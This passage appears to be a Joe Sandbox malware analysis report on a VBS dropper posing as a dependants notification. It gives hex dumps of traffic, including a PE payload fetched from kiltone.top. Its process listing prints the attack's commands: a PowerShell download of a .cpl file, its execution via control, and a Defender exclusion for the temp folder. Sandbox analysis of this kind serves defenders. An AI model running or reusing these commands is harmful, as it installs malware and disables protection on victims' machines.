2024-12-19 06:52:34 UTC	14808	IN	Data Raw: 99 79 52 dd 63 8a 3e cf df 5e f0 78 ee 49 23 b8 9d 4f 35 4e f3 2c f6 47 ef 2d 34 72 50 1f 28 f5 f0 66 0a 6e 2f 12 00 8f 9f ee 30 6e 45 61 20 25 fb cc 74 cb 50 4a 66 fe 1b 15 27 78 1e f4 7e d4 84 c5 12 22 2d c6 e8 e6 23 97 47 8a c5 31 7d 0c ad c2 c6 2b 02 9d 15 ed 20 c3 79 73 13 52 3a 80 16 15 93 0d a0 05 d0 35 13 1e 4d 56 59 c6 62 31 ad 0b 31 54 c4 7e 83 8f 52 44 da df 4b 06 30 03 a6 90 2e 35 8d e1 09 7b 55 11 aa 88 af 2a 49 b5 d5 c9 52 23 8d a0 27 eb 1e 5b 1f c5 15 b6 1e bf 8f 2e 35 33 ff bd a1 58 ee 82 2e 55 ab b0 00 b5 62 15 e2 c0 2e 35 b2 c7 d7 14 e0 16 da bb 3e 8a 62 ea b0 30 8a f8 20 3c 2b d8 ef 29 46 74 bf 65 06 d0 25 50 84 20 4e 56 f0 89 5d b1 23 45 94 f0 9c c0 33 ef b7 ca 87 b6 50 fb 7d 95 3c 08 cc 06 93 e5 3c e8 43 48 d1 fe 0d 95 8c 78 fa 51 7d Data Ascii: yRc>^xI#O5N,G-4rP(fn/0nEa %tPJf'x~"-#G1}+ ysR:5MVYb11T~RDK0.5{U*IR#'[.53X.Ub.5>b0 <+)Fte%P NV]#E3P}<<CHxQ}
2024-12-19 06:52:34 UTC	1576	IN	Data Raw: d5 89 4f 7f e7 36 0a d7 00 fe 2d 98 7e 96 46 21 f3 37 c8 3f 28 90 f3 9c 27 e4 0a 57 35 15 13 ac e6 49 20 fa a0 4f 68 e5 d6 ee e6 08 e1 f4 87 9c de 1b e7 1c 83 d7 ca b9 06 ff 00 22 06 31 3e a7 f0 17 21 17 20 dd a6 c9 5c 4f 7f 88 fd 35 e9 ff a4 b7 64 ca 91 86 f4 6b 99 72 64 53 fa bc 21 d7 b6 c4 5e 9a 8c 2e b1 97 26 07 32 ed 31 90 28 83 fe 78 54 a1 b4 e3 0a b8 bb 3b 98 b5 77 5f 9c 6d f4 b2 2a 25 71 88 ce f5 c7 99 10 48 7e 3f 0b b2 60 70 50 1c f0 fa 7c 0c 14 06 11 b1 7d 1e f3 18 49 84 65 46 24 46 13 87 64 26 48 74 88 b2 6b 31 66 ae d8 37 5f 45 1c 91 e8 60 94 59 a3 71 1f 33 05 94 9e 17 e2 3e d1 e7 9d 8b 53 16 8b e1 50 48 f1 52 d6 c2 5b 2d 8a 42 55 5d 3a 39 c4 aa 70 c8 e8 51 56 cf f9 f5 5c f2 5a 2c 4e d1 9b b9 24 65 8e 58 3c 81 23 94 f3 1c bc d5 c4 5b 4d 09 6f Data Ascii: O6-~F!7?('W5I Oh"1>! \O5dkrdS!^.&21(xT;w_m*%qH~?`pP\|}IeF$Fd&Htk1f7_E`Yq3>SPHR[-BU]:9pQV\Z,N$eX<#[Mo
2024-12-19 06:52:34 UTC	16384	IN	Data Raw: c1 d2 79 4b d9 4f b0 b5 8c fd 94 55 c3 7e ca ba 9b fd 94 b5 9c db 0c c0 b8 87 db 64 a3 96 db 64 23 cc 6d b2 51 c7 3e 41 18 f5 ec c3 c6 0a f6 61 a3 81 7d d8 58 a9 e2 2a 85 75 af 8a 8b ad fb 54 5c 6c ad 52 71 b1 b5 5a c5 c5 d6 1a 15 17 5b f7 ab b8 d8 5a ab e2 62 6b 1d c6 b8 28 36 81 0f a8 54 a4 18 e6 b7 b4 39 1d e6 83 3c e8 2a 35 03 a9 f5 b8 46 8d cf 43 da 64 9f 0d ca 47 18 9f 87 51 78 6a ac d6 47 54 4a 95 78 54 9b 5c 62 a3 36 d9 7d 13 ea 31 0e 8f 69 93 1d 36 6b 93 1d be 0d 5f 7f ac be 2d 2a a5 dc b7 6a 93 dd b7 69 93 dd 1f 47 49 e3 b0 5d 9b ec f0 1d 6d b2 c3 0e f8 4e 8b d5 f7 84 4a 29 f7 ef 6a 93 dd bf a7 4d 76 7f 12 25 8d c3 53 da 64 87 a7 b5 c9 0e 3b bd 4d 7d 1c 32 fa 58 2d cd 8f 24 ad 8c 58 d9 95 9b a2 f7 f0 68 f3 1b d1 45 25 7f 38 fe ea cc da 14 ff 7f Data Ascii: yKOU~dd#mQ>Aa}XuT\lRqZ[Zbk(6T9<5FCdGQxjGTJxT\b6}1i6k_-*jiGI]mNJ)jMv%Sd;M}2X-$XhE%8
2024-12-19 06:52:34 UTC	16384	IN	Data Raw: 53 4d ab 85 aa b5 95 90 d6 48 6b 57 67 18 88 cd 89 a0 17 22 8c 4e 35 3c 18 96 84 94 e1 41 fa e0 0f 67 cf 7d 7a 69 fd 01 95 d6 f9 83 e3 17 27 3e be cd ee 39 b7 ff 45 79 d5 c6 b4 75 9d e1 73 8e bf 80 7c e0 6b 63 0c d8 98 8f 6b 63 08 21 10 8c b1 1d 3e 7c 8d 0d 26 e0 05 1c 0c e1 a3 c1 59 13 06 c9 92 54 2d a3 cd 07 4d 1a 93 90 8f 69 93 9a 46 53 33 75 99 54 75 3f a6 6c 53 34 2d 9a b4 a5 da a4 6e da 8f 49 9d a6 49 5b 9b f6 c7 b4 8f ac d3 a6 4d d3 b4 a9 4d c6 65 cf 39 f7 62 20 59 36 2d 04 0b df 7b ee 39 ef fb bc cf fb bc cf 9d 99 f9 ea 24 6a f6 bd 8e a3 f1 f8 67 3b d4 16 0d 07 7e f6 61 9c bd 85 34 28 75 88 c5 00 f2 cd 20 6d 71 6a fb 20 31 1a 4d 07 89 c9 14 32 a5 24 fe cf 6a 2e ac 68 b4 d7 38 f2 3f 63 8c aa 97 68 46 fd 06 bd bc f2 77 76 6f e1 9b 0b 77 16 d6 f6 8d Data Ascii: SMHkWg"N5<Ag}zi'>9Eyus\|kckc!>\|&YT-MiFS3uTu?lS4-nII[MMe9b Y6-{9$jg;~a4(u mqj 1M2$j.h8?chFwvow
2024-12-19 06:52:34 UTC	16384	IN	Data Raw: 9b 85 cc 6a c5 a4 25 08 35 75 06 ca 41 0a 84 73 6a 0d 82 9f 36 a0 2d c8 82 d0 83 ce 41 35 88 fb 53 16 7e 39 a6 64 51 33 c7 24 72 09 42 ef 79 05 62 87 6c 1d e7 c9 27 53 eb a8 ad 98 b6 31 8f 1d e4 16 35 0d cf 2c db e2 9c 56 81 30 17 cb 0e 59 19 27 c1 0e b2 84 83 a9 40 e8 dd d4 88 8c 55 e0 57 a2 23 6b bf ff 9a a9 10 ad d8 53 56 38 9d c1 84 23 29 ae 64 ea b8 25 d0 ea 06 c4 5b 62 1a f4 a1 b0 09 4d f4 b4 20 cc d4 e6 bc 8c 71 eb 96 b5 0c b7 47 fc ec 7c 77 f5 3e ac 3b 5f 31 de f3 65 c3 07 47 3f b7 70 1a 27 11 b2 96 37 f9 02 00 00 ff ff 00 00 00 ff ff 03 00 b3 a2 e6 f7 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 39 39 31 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 31 37 37 2e 38 34 20 31 33 2e 32 5d 2f 46 6f 72 6d 54 79 70 65 20 Data Ascii: j%5uAsj6-A5S~9dQ3$rBybl'S15,V0Y'@UW#kSV8#)d%[bM qG\|w>;_1eG?p'7endstreamendobj991 0 obj<</BBox[0.0 0.0 177.84 13.2]/FormType
2024-12-19 06:52:34 UTC	14808	IN	Data Raw: 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 30 37 38 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 35 34 2e 30 20 31 31 2e 35 32 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 Data Ascii: Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1078 0 obj<</BBox[0.0 0.0 54.0 11.52]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/F
2024-12-19 06:52:34 UTC	16384	IN	Data Raw: 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 31 36 30 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 35 34 2e 30 20 31 31 2e 36 34 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 Data Ascii: >/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1160 0 obj<</BBox[0.0 0.0 54.0 11.64]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:52:46 UTC	176	OUT	GET /stelin/Gosjeufon.cpl HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: kiltone.top Connection: Keep-Alive
2024-12-19 06:52:47 UTC	253	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 19 Dec 2024 06:52:46 GMT Content-Type: application/octet-stream Content-Length: 902856 Last-Modified: Wed, 18 Dec 2024 23:38:35 GMT Connection: close ETag: "67635cfb-dc6c8" Accept-Ranges: bytes
2024-12-19 06:52:47 UTC	16131	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 84 7b 68 8b c0 1a 06 d8 c0 1a 06 d8 c0 1a 06 d8 b3 78 05 d9 d2 1a 06 d8 b3 78 03 d9 72 1a 06 d8 b3 78 02 d9 d7 1a 06 d8 92 6f 02 d9 d1 1a 06 d8 92 6f 05 d9 d8 1a 06 d8 92 6f 03 d9 9f 1a 06 d8 0a 6f 03 d9 e9 1a 06 d8 b3 78 00 d9 c1 1a 06 d8 b3 78 07 d9 cf 1a 06 d8 c0 1a 07 d8 71 1a 06 d8 0a 6f 0f d9 c1 1a 06 d8 0a 6f f9 d8 c1 1a 06 d8 c0 1a 91 d8 c1 1a 06 d8 0a 6f 04 d9 c1 1a 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.${hxxrxooooxxqooo
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 04 00 00 00 e8 c0 17 01 00 c7 06 4c bc 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 00 00 00 00 e8 50 17 01 00 c7 06 b4 b3 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 02 00 00 00 e8 e0 16 01 00 c7 06 Data Ascii: ENHFLHMdY^]Ujh3HdPQV4aK3PEduWfFuENHFPHMdY^]Ujh3HdPQV4aK3PEduWfFuENHF
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 45 fc 02 00 00 00 50 8b cf e8 ef 02 00 00 8d 77 18 50 8b ce e8 04 d7 00 00 8b 95 a4 fe ff ff 83 fa 10 72 2f 8b 8d 90 fe ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 9a 02 00 00 52 51 e8 68 4e 05 00 83 c4 08 83 7e 14 10 72 02 8b 36 ff 77 28 8b 85 00 ff ff ff 8d 8d 00 ff ff ff 56 ff 50 10 8d 45 cc 50 8b 85 00 ff ff ff 8d 8d 00 ff ff ff ff 50 18 6a 4c 8d 85 b0 fe ff ff 6a 00 50 e8 ec 6b 05 00 83 c4 0c c7 85 90 fe ff ff 00 00 00 00 8d 8d 90 fe ff ff c7 85 a0 fe ff ff 00 00 00 00 c7 85 a4 fe ff ff 0f 00 00 00 c6 85 90 fe ff ff 00 6a 00 68 5b 38 4a 00 e8 a2 fb 00 00 c6 45 fc 03 8d 8d 74 fe ff ff 6a 01 c7 85 74 fe ff ff 00 00 00 00 68 bc 3d 4a 00 c7 85 84 fe ff ff 00 00 00 00 c7 85 88 fe ff ff 0f 00 00 00 c6 85 74 fe ff Data Ascii: EPwPr/BrI#+RQhN~r6w(VPEPPjLjPkjh[8JEtjth=Jt
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 8d 14 fb ff ff 8b 85 00 fb ff ff 47 57 89 bd 48 e7 ff ff 8b 40 04 03 c8 8b 01 25 ff f9 ff ff 0d 00 08 00 00 89 01 8d 8d 00 fb ff ff e8 ec 91 00 00 8d 45 b8 50 8d 8d f0 fa ff ff e8 1d 64 00 00 6a 5c 8d 85 88 fe ff ff c6 45 fc 0e 6a 00 50 e8 29 2c 05 00 83 c4 0c 8d 8d 88 fe ff ff e8 6b 52 00 00 c7 85 70 ff ff ff 00 00 00 00 c7 45 80 00 00 00 00 c7 45 84 0f 00 00 00 c6 85 70 ff ff ff 00 c6 45 fc 10 8b 8d 90 fe ff ff ff 35 00 60 4b 00 6a 10 8b 01 ff b5 24 ff ff ff ff 50 18 8d 8d 88 fe ff ff e8 b4 41 03 00 6a 78 e8 87 0b 05 00 8b f8 83 c4 04 89 bd 44 e7 ff ff 6a 78 6a 00 57 c6 45 fc 11 e8 b4 2b 05 00 83 c4 0c 6a 10 e8 64 0b 05 00 8b f0 83 c4 04 89 b5 50 e7 ff ff 0f 57 c0 c6 45 fc 12 6a 00 8b ce 0f 11 06 e8 6c 50 01 00 8d 85 70 ff ff ff c7 06 18 dd 48 00 c7 46 Data Ascii: GWH@%EPdj\EjP),kRpEEpE5`Kj$PAjxDjxjWE+jdPWEjlPpHF
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 8d 8d 88 fe ff ff e8 e2 55 00 00 8d 85 88 fe ff ff c6 45 fc 2c 50 8d 4d e4 e8 5f 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 60 55 00 00 68 a0 55 4a 00 8d 8d 88 fe ff ff e8 b0 55 00 00 8d 85 88 fe ff ff c6 45 fc 2d 50 8d 4d e4 e8 2d 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 2e 55 00 00 8d 4d e4 33 f6 e8 f4 0c 00 00 85 c0 74 6b ba a8 55 4a 00 b9 38 cf 4b 00 e8 e1 96 00 00 50 e8 fb 9e 00 00 83 ec 14 8d 45 9c 8b cc 89 a5 84 fe ff ff 50 e8 47 57 00 00 83 ec 40 c6 45 fc 2e 8b cc 8d 85 fc fe ff ff 6a 01 50 e8 d0 8b ff ff 56 8d 4d e4 e8 87 0c 00 00 8b c8 e8 c0 54 00 00 8b c8 c6 45 fc 13 e8 95 d3 ff ff 83 c4 58 8d 4d e4 46 e8 89 0c 00 00 3b f0 72 95 8d 8d a0 fe ff ff e8 7a 00 00 00 8d 4d b4 e8 f2 0b 00 00 8d 4d 84 e8 9a 54 00 00 8d 8d 6c ff ff ff e8 8f 54 00 00 8d Data Ascii: UE,PM_E`UhUJUE-PM-E.UM3tkUJ8KPEPGW@E.jPVMTEXMF;rzMMTlT
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 7c 72 8b 5d 0c 7f 04 85 db 74 69 c6 45 fc 02 50 8b 06 53 ff 75 08 8b 48 04 8b 4c 31 38 e8 8b 35 00 00 89 46 08 89 56 0c 3b c3 75 05 3b 55 10 74 3c bf 03 00 00 00 eb 35 8b 4d ec 6a 01 8b 01 8b 70 04 b8 04 00 00 00 03 f1 33 c9 8b 56 0c 83 ca 04 39 4e 38 0f 45 c1 8b ce 0b c2 50 e8 7c d7 fe ff b8 6a 4b 41 00 c3 8b 75 ec 8b 7d e8 c7 45 fc 01 00 00 00 8b 06 6a 00 8b 48 04 b8 04 00 00 00 03 ce 8b 51 0c 0b d7 33 ff 39 79 38 0f 45 c7 0b c2 50 e8 46 d7 fe ff c7 45 fc 04 00 00 00 8b 06 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc 8b 41 e8 8b 40 04 c7 44 08 e8 d4 5e 4a 00 8b 41 e8 8b 50 04 8d 42 e8 89 44 0a e4 c3 cc cc cc cc 55 8b ec 83 e4 f8 83 ec 1c 8b 45 10 53 8b 5d 0c 03 5d Data Ascii: \|r]tiEPSuHL185FV;u;Ut<5Mjp3V9N8EP\|jKAu}EjHQ39y8EPFE@L08tPMdY_^[]A@D^JAPBDUES]]
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 83 ef 01 75 bb 8b 45 fc 5b 8b 4d 10 5f 89 70 04 89 08 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 0c 53 8b 5d 18 56 8b 75 14 57 8b 7d 1c 89 45 f8 85 ff 74 55 0f 1f 40 00 85 f6 74 40 8b 46 20 8a 0b 88 4d ff 83 38 00 74 20 8b 56 30 8b 02 85 c0 7e 17 48 89 02 8b 4e 20 8b 11 8d 42 01 89 01 8a 45 ff 88 02 0f b6 c0 eb 0b 8b 16 0f b6 c1 8b ce 50 ff 52 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 43 83 ef 01 75 b2 8b 45 f8 8b 4d 10 5f 89 70 04 5e 89 08 5b 8b e5 5d c3 55 8b ec 6a ff 68 e5 55 48 00 64 a1 00 00 00 00 50 83 ec 4c a1 34 61 4b 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 7d 24 8b 45 0c 8b 4d 18 8b 5d 20 89 45 a8 89 4d ac 85 ff 74 11 8a 03 3c 2b 74 04 3c 2d 75 07 be 01 00 00 00 eb 02 Data Ascii: uuEuE[M_p^]UES]VuW}EtU@t@F M8t V0~HN BEPRuuECuEM_p^[]UjhUHdPL4aK3ESVWPEd}$EM] EMt<+t<-u
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 8b 45 fc 2b c8 3b d1 77 59 0f 10 07 40 50 0f 11 03 f3 0f 7e 47 10 66 0f d6 43 10 c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 8b 3b 57 8d 04 17 50 e8 ba 26 04 00 83 c4 0c 83 7e 14 10 72 02 8b 36 8b 4d f4 51 56 57 e8 a4 26 04 00 8b 45 f8 83 c4 0c 89 43 10 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 b8 ff ff ff 7f 2b c2 3b 45 fc 0f 82 c0 00 00 00 8b 45 f8 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 33 c9 89 45 ec 83 c0 01 0f 92 c1 f7 d9 0b c8 81 f9 00 10 00 00 72 26 8d 41 23 3b c1 0f 86 85 00 00 00 50 e8 74 0b 04 00 83 c4 04 85 c0 74 7d 8b 55 f4 8d 48 23 83 e1 e0 89 41 fc eb 19 85 c9 74 13 51 e8 55 0b 04 00 8b 55 f4 83 c4 04 8b c8 89 45 f0 eb 05 33 c9 89 4d f0 8b 45 f8 89 43 10 8b 45 ec 89 0b Data Ascii: _^[]E+;wY@P~GfCGG;WP&~r6MQVW&EC_^[]+;EE=v;B3Er&A#;Ptt}UH#AtQUUE3MECE
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 8b 4d ec 8b f0 ff 75 d4 8b 3e e8 7e 09 00 00 50 ff 75 f0 8b ce ff 75 e8 ff 57 10 8b 55 c8 39 55 c4 8b 75 cc 8b fe 0f 42 55 c4 33 c0 c6 45 fc 0d 8b ca f3 ab 56 85 d2 74 07 e8 ff a3 02 00 eb 05 e8 68 a4 02 00 83 c4 04 8b 55 f0 32 c0 8b fa c7 45 fc 0e 00 00 00 8b cb f3 aa 52 e8 4d a4 02 00 8b 45 e8 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 8d e8 00 00 00 33 cd e8 8e c9 03 00 8d a5 ec 00 00 00 5d c2 18 00 8b 03 6a 0a ff 50 10 50 8d 85 d0 00 00 00 50 e8 2e f7 ff ff 8b f8 6a 0a 8d 85 90 00 00 00 c7 45 fc 00 00 00 00 56 50 e8 16 f7 ff ff 83 c4 18 8b f0 8b 43 04 8d 4b 04 8d 55 78 c6 45 fc 01 52 ff 50 08 68 b0 bb 48 00 50 8d 45 60 c6 45 fc 02 50 e8 5d 9a ff ff 56 50 8d 45 48 c6 45 fc 03 50 e8 9e 9a ff ff 68 88 bb 48 00 50 8d 45 30 c6 45 fc 04 50 e8 3b Data Ascii: Mu>~PuuWU9UuBU3EVthU2ERMEMdY_^[3]jPPP.jEVPCKUxERPhHPE`EP]VPEHEPhHPE0EP;
2024-12-19 06:52:47 UTC	16384	IN	Data Raw: 88 5f 08 8b 75 08 8b ce 57 c6 45 fc 00 e8 ab e9 01 00 8b 4d e8 c7 45 fc 03 00 00 00 85 c9 74 06 8b 11 6a 01 ff 12 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc 56 8b f1 e8 e8 11 fe ff f6 44 24 08 01 74 0b 6a 14 56 e8 64 8e 03 00 83 c4 08 8b c6 5e c2 04 00 f6 44 24 04 01 56 8b f1 c7 06 7c bc 48 00 74 0b 6a 0c 56 e8 43 8e 03 00 83 c4 08 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 08 72 4b 00 68 20 6c 4b 00 8b f1 e8 06 a3 03 00 8b 7c 24 1c 83 c4 08 85 c0 75 15 8d 46 10 50 57 ff 74 24 18 e8 14 29 00 00 83 c4 0c 84 c0 75 1a ff 74 24 10 68 1c 6c 4b 00 ff 74 24 14 e8 0b 04 fe ff 8a 46 10 83 c4 0c 88 07 5f 5e c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 08 72 4b 00 68 10 6c 4b 00 8b f1 e8 a6 a2 03 Data Ascii: _uWEMEtjMdY_^[]VD$tjVd^D$V\|HtjVC^VWhrKh lK\|$uFPWt$)ut$hlKt$F_^VWhrKhlK

Target ID:	0
Start time:	01:52:15
Start date:	19/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
Imagebase:	0x7ff695840000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	01:52:19
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Imagebase:	0x7ff710660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	01:52:21
Start date:	19/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Imagebase:	0x7ff6b2cb0000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	11
Start time:	01:52:22
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Imagebase:	0x7ff710660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	01:52:30
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Imagebase:	0x7ff710660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	01:52:36
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NOTIFICATION_OF_DEPENDANTS.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Operating System Destruction

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

